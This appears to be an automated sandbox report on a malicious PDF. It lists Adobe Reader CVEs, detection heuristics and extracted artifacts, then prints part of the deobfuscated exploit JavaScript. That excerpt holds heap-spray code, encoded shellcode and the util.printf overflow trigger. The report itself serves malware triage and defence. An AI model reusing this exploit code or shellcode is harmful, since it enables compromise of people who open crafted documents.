Verdict: MALICIOUS
Risk Score: 616

Malware Insights

MITRE ATT&CK:
- T1203 Exploitation for Client Execution
- T1059.007 JavaScript
This PDF file contains obfuscated JavaScript that exploits multiple known Adobe Reader vulnerabilities, including CVE-2009-4324, CVE-2009-0927, CVE-2007-5659, and CVE-2008-2992. The script is designed to download and execute a second-stage payload, as indicated by the exploit cluster and dispatcher heuristics. The specific payload and its ultimate target are not discernible from the provided evidence.
Machine Learning
- Nyx PDF Classifier: malicious score 1.0000
Heuristics (12)
- media.newPlayer — CVE-2009-4324 (critical, CVE exact, CVE_2009_4324): PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
- Collab.getIcon — CVE-2009-0927 (critical, CVE exact, CVE_2009_0927): PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
- Collab.collectEmailInfo — CVE-2007-5659 (critical, CVE exact, CVE_2007_5659): PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
- util.printf — CVE-2008-2992 (critical, CVE exact, CVE_2008_2992): PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
- Pidief-style multi-CVE JavaScript dispatcher (critical, CVE likely, PDF_PIDIEF_MULTI_CVE_DISPATCH): A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
- ClamAV: Pdf.Exploit.Agent-36086 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Pdf.Exploit.Agent-36086
- Multi-CVE Adobe Reader JavaScript exploit kit (critical, PDF_ADOBE_READER_MULTI_CVE_JS_KIT): One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
- JavaScript action (low, 3 related findings, PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical, PDF_JS_EXPLOIT_CLUSTER): PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
- Large comment-padded JavaScript eval stager (high, PDF_JS_LARGE_COMMENT_PADDED_EVAL): PDF JavaScript contains a very large stream padded with long random-looking block comments around String.fromCharCode and eval. This is an exploit-kit obfuscation shape used to bury a decoder and recovered stage inside noise, not normal PDF form automation.
- Embedded JS stream (low, PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | SHA-256 | Kind | Source | Size |
|---|---|---|---|---|
| javascript_obj0006_000.js | 9a4d661b3e27635dd8a48f396b7827a52499204ce03afaa9a2ebca68fd2196ef | pdf-javascript-stream | PDF /JS object 6 at offset 0x143 | 425894 bytes |
| legacy_pdfkit_stage_000.js | edc19b87ffb7dd6fb1d386d4c6c72bc4495600a00492987dec74770256409b30 | deobfuscated-js | comment-padded substitution-hex decoded JavaScript at offset 0x143 | 10413 bytes |

javascript_obj0006_000.js
- Detection: ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 2 eval/decoder/string-building token(s) and 42 long base64-like blob(s).
- Preview script (first 1,000 lines of the extracted script):

function Ba(Xa){ /*
... (truncated)

legacy_pdfkit_stage_000.js
- Detection: ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 12 eval/decoder/string-building token(s) and 1 long base64-like blob(s).
- Preview script (first 1,000 lines of the extracted script):
function fix_it(yarsp,len)
{
while(yarsp.length*2<len){yarsp+=yarsp;} yarsp=yarsp.substring(0,len/2);return yarsp;
}
function util_printf()
{
var payload=unescape("%u9090%u9090%u9090%u20EB%u8B5E%uADFE%uC00B%u0175%u8BC3%u2BD8%uABC0%uC88B%uB966%u021F%uE9C1%u4102%u33AD%uABC3%uFAE2%u09EB%uDBE8%uFFFF%u32FF%uF7FC%u5608%uC75D%u3208%u7CFC%u3E48%u8777%u9F14%u8777%uB300%uF738%uCDFF%u7C03%u89E4%uF7B4%u3208%uF796%uBC60%uF9B2%u5AE4%u0964%u3C82%u1894%uD2C6%u9F9C%uF83B%uAC76%u0A60%u5BDE%u5AEF%uBE16%uDA82%u2C94%u1182%u9F15%u7E53%u2AE6%uDE60%uF46B%uDA04%uF6E3%u3208%uF375%uB123%uF317%uF203%u0689%u5C60%u8399%u5A08%u9E8B%u5B66%u08A8%u1A5D%uAEA5%uF203%u73F3%u32F0%uF7FC%uC283%uAF47%u3208%u9DFC%u5A08%uB3D5%u65E0%uBE94%u3DE5%u9F82%u7983%uA81F%uD2E0%uF7FC%uBB08%uDCF8%uD98B%uFCF8%u47C8%u7A0D%u328D%uF7FE%u6208%u0894%u3208%u08FC%u065D%u7271%u3608%uF7FC%u5858%u9DFC%uBF08%uF779%u320A%uA7FC%u67F7%u7AC4%u32BD%uF7F8%u9E08%u37F6%uC97D%u30B2%u1C0E%u8F99%uF56D%uF3BA%u3208%uF7FC%uB785%uF3FC%u3208%u3ECF%u6259%uA203%u7234%u73F3%u3288%uF7FC%uBB40%uBBB9%u3260%uF7BC%u5808%u08BC%u7A5D%u37F7%u5C7C%uB275%u5868%u9DFC%u5808%u9DFC%u5808%u08FC%u625D%u37F7%u687C%uF796%u3260%uF7FC%u580C%u9DFC%uDB08%uF756%u3208%u08AC%u665D%u37F7%u707C%uB275%uBF60%u93B9%u5A58%uB7FC%u3208%u8203%uCD68%u9F89%u67F7%uFCA4%u46C8%u7CE9%u564D%u37F7%u3C7C%u8203%uCD6C%u9789%u47F7%u08B0%u725D%u2217%u47F7%u08B0%u765D%u3ED7%u6349%u7271%u3608%uF7FC%uCD58%uDBA9%uCD62%uA203%u6738%u1B77%u4F83%uFCF4%u46F7%uA4B7%uEC83%u7CAA%u0E7B%u8377%u4A3B%u04FF%uB95E%uD78A%uC10B%u3ECF%u7341%uF451%u64CB%u01CF%u8C07%uCFEC%u46DE%u36F4%u3FC6%u05FF%uD948%uCC0D%u6CF6%u1289%uB952%u7C17%u1652%u2AFF%uB96E%uBCF0%u6883%uF4E0%uB9D5%u7CF8%uF70B%uACA2%u30E3%u37CF%uF055%uF7F8%u63E0%u0803%u5AF7%u8388%u0878%uD8D3%u4169%u9695%u4266%u8593%u4666%u9E8E%u1C78%u989F%u1D65%u8588%u5669%uD899%u5137%uC6C1%u412E%u9395%u0635%u94CD%u043E%u95CE%u503C%u929D%u0539%uC7CE%u0B31%uC59F%u5431%u92C8%u073E%uCFC5%u576B%u9298%u143B%uCA8F%u323B%uF7FC%u0008");
var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
var heapblock=nop+payload;
var bigblock=unescape("%u0A0A%u0A0A");
var headersize=20;
var spray=headersize+heapblock.length;
while(bigblock.length<spray){bigblock+=bigblock;}
var fillblock=bigblock.substring(0,spray);
var block=bigblock.substring(0,bigblock.length-spray);
while(block.length+spray<0x40000){block=block+block+fillblock;}
var mem_array=new Array();
for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}
var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",num);
}
function collab_email()
{
var shellcode=unescape("%u9090%u9090%u9090%u20EB%u8B5E%uADFE%uC00B%u0175%u8BC3%u2BD8%uABC0%uC88B%uB966%u021F%uE9C1%u4102%u33AD%uABC3%uFAE2%u09EB%uDBE8%uFFFF%u32FF%uF7FC%u5608%uC75D%u3208%u7CFC%u3E48%u8777%u9F14%u8777%uB300%uF738%uCDFF%u7C03%u89E4%uF7B4%u3208%uF796%uBC60%uF9B2%u5AE4%u0964%u3C82%u1894%uD2C6%u9F9C%uF83B%uAC76%u0A60%u5BDE%u5AEF%uBE16%uDA82%u2C94%u1182%u9F15%u7E53%u2AE6%uDE60%uF46B%uDA04%uF6E3%u3208%uF375%uB123%uF317%uF203%u0689%u5C60%u8399%u5A08%u9E8B%u5B66%u08A8%u1A5D%uAEA5%uF203%u73F3%u32F0%uF7FC%uC283%uAF47%u3208%u9DFC%u5A08%uB3D5%u65E0%uBE94%u3DE5%u9F82%u7983%uA81F%uD2E0%uF7FC%uBB08%uDCF8%uD98B%uFCF8%u47C8%u7A0D%u328D%uF7FE%u6208%u0894%u3208%u08FC%u065D%u7271%u3608%uF7FC%u5858%u9DFC%uBF08%uF779%u320A%uA7FC%u67F7%u7AC4%u32BD%uF7F8%u9E08%u37F6%uC97D%u30B2%u1C0E%u8F99%uF56D%uF3BA%u3208%uF7FC%uB785%uF3FC%u3208%u3ECF%u6259%uA203%u7234%u73F3%u3288%uF7FC%uBB40%uBBB9%u3260%uF7BC%u5808%u08BC%u7A5D%u37F7%u5C7C%uB275%u5868%u9DFC%u5808%u9DFC%u5808%u08FC%u625D%u37F7%u687C%uF796%u3260%uF7FC%u580C%u9DFC%uDB08%uF756%u3208%u08AC%u665D%u37F7%u707C%uB275%uBF60%u93B9%u5A58%uB7FC%u3208%u8203%uCD68%u9F89%u67F7%uFCA4%u46C8%u7CE9%u564D%u37F7%u3C7C%u8203%uCD6C%u9789%u47F7%u08B0%u725D%u2217%u47F7%u08B0%u765D%u3ED7%u6349%u7271%u3608%uF7FC%uCD58%uDBA9%uCD62%uA203%u6738%u1B77%u4F83%uFCF4%u46F7
... (truncated)